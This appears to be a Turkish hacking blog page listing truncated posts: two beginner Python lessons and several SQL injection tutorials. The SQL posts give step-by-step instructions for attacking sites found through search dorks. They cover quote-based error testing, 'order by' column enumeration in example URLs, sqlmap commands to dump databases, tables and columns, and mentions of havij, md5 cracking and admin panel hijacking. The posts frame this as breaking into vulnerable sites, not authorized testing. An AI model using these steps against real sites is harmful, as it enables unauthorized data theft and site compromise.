AquieLL l Siber Güvenlik

// Python Dersleri - 2 [ STRİNG ] // AquieLL  ---  " xxx "   Genellikle  tırnak içinde ne olursa olsun bunlara   karakter dizisi ( string )  diyoruz. Kod: >>> "merhaba" >>> 'merhaba' olarak bize veriyor.İşte bu bir string'dir.Bunu bir de tek tırnakla da yapabiliriz Kod: >>>'merhaba dostlarım' >>>'merhaba dostlarım' olarak basılacaktır. --- Mesela pythonda bize içi boş karakter dizisi'de yardımcı olacak ilerde göreceğiz. Peki bunu nasıl yapacağız. Kod: >>>" " >>>' ' olarak içi boş string oluşturmuş oluyoruz. Kod: >>>" " >>>' ' içinde bir adet boşluk bulunduran string olmuş oluyor. --- Şimdi göstereceğim örnekte de  'AquieLL'in konusu'  diye bir stirng oluşturduğumuz da neden hata veriyor ? nasıl çözeriz ? bakalım.. başlangıç tek tırnak olduğu için AquieLL'in derken ki tek tırnağı son

Merhaba dostlar, görüldüğü üzere python diline'de el atmış bulunmaktayım.Bazıları soracaktır neden böyle birşey yapıyorsun ? Arkadaşlar bu dil üzerinde kendimi geliştirmek istiyorum ve öğrendiklerimi buraya aktarmak istiyorum.Şuanlık 4-5 Derslik birşey biliyorum.Böylece hemen tekrar etmiş olacağım ve sizlere bu bilgileri paylaşmış olacağım.Dersler kendi çıkardığım notlardan olacak haydi başlayalım . ------------------------------------------------------------------------ // Python Dersleri - 1 [ SAYILAR ] // AquieLL  İşlem Operatörleri : Kod: + Toplama - Çıkarma * Çarpma / Bölme ---   Arkadaşlar python sayıları direk algılayabilir ve Sonucu bize verebilir.Şöyle örneğini görelim Kod: >> 3 + 5 >> 8 Kod: >>5 - 2 >> 3 Kod: >>5 * 4 >>20 Kod: >>20 / 5 >>4 Gibi işlemleri direk yapabiliyoruz . ---   Peki Python'da Bir sayının üslü ifadesini nasıl bulabiliriz.Arkadaşlar bunu " ** " ifadesi ile yap

Merhaba arkadaşlar burada sql hacking ile ilgili bir örnek saldırı videosu çektim.SQL hack ile ilgili son konu video içeriği olarak ; Açıklı site, havij ile veritabanına ulaşma,md5 çözme,panel bulma ve hackleme işlemleri vardır. İyi seyirler. 

Merhaba arkadaşlar  Bu konunun direk videosunu çektim ; video ;

Konu : // SQL İnjection Manual Hacking // AquieLL  Başlayalım... Elimizde Bir Site Var SQL Açıklı Olup Olmadığını Anlamak İçin İD=1 değerinin Sonuna   " 'a "   Ekliyoruz. Karşımıza Şöyle Bir Hata Benzeri Bir Hata Çıkarsa Site SQL Açıklı Bir Sitedir. Kod: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Kod: www.örneksite.com/hack.php?id=1 Biz SQL Hatamızı Aldık ve İlk Aşamamız Siteye  "+order+by+ " Komutunu Çalıştırmaktır. Hangi Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Sayıdır. Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim. Yani ; Kod: www.örneksite.com/hack.php?id=1+order+by+1 (Hala SQL Hatası Var) Kod: www.örneksite.com/hack.php?id=1+order+by+2 (Hala SQL Hatası Var) Kod: www.örneksite.com/hack.php?id=1+order+by+3 (Hala SQL Hatası Var) Kod: www.örneksite.com/hack.php?id=1+order+by+4 (SQL

Merhaba arkadaşlar  bugünkü konumuz,dorkumuzu yazdık,açıklı site bulduk, sqlmap ile veritabanına sızmaya çalıştık ama veritabanını çekemedik işte burada sqlmap parametreleri devreye giriyor. iyi okumalar :)  video burada açıklaması aşağıda ; -------------------------------------- // PARAMETRE TANIMLARI //  --risk :   1 ile 3 arasında değerler alabilen parametremiz. Eğer belirtilmezse default olarak 1 değerini alır.  Risk  1 daha sınırlı sql cümleleri ile denetleme yapar.  Risk  2'de  risk  1'in üzerine heavy-query time based saldırılar da denetlemeye tabii tutulur.  Risk  3'te ise ekstradan Or-based testler de eklenir. --level :   1 ile 5 arasında değerler alabilen parametremiz. 1. seviyede daha kısıtlı testler denetlenirken, 5.seviyede daha fazla payload, daha detaylı prefix ve suffixler ile zenginleştirilmiş payloadlar kullanılmaktadır. Ayrıca HTTP Cookie başlığı 2.seviyeden sonra ve HTTP User-Agent/Referer başlıkları da seviye 3'ten sonra denetl

Merhaba arkadaşlar bu yazının konusu ; -Dork yazdık,açıklı site bulduk ve şimdi veritabanını hacklemek için havij yerine sqlmap ile veritabanına ulaşıyoruz. 1.1-)Python ve SQLMAP Kurulumu Gerekli Malzemeler ;  -Python 2.7.8 -sqlmap dosyası ("http://sqlmap.org/") Kurulumu ; -Python 2.7.8 bilgisayara indirip setup ile kuruyoruz -Daha sonra "sqlmap" adlı dosyayı " Bilgisayım >> Yerel Disk C:// " dizinine atalım. 1.2-)Hack Aşaması  1-)cmd açalım çalıştır >> cmd 2-)C://sqlmap klasörüne inelim tek tek yazıyoruz.  cd..  cd.. cd sqlmap   3-)Sitenin veritabanını çekelim. sqlmap.py -u sqlaçıklıurl --dbs Not: Bu işlemden sonra [Y/n] Sorusu gelecek hepsine "Y" Diyoruz. 4-)Sitenin Tablolarını çekelim sqlmap.py -u sqlaçıklıurl veritabanıadı --tables  5-)Sitenin Kolonlarını çekelim.Hangi kolonu istiyorsanız onu çekin. sqlmap.py -u sqlaçıklıurl -D veritabanıadı -T tabloadı --columns 6-)Çekitğimiz kolonda iş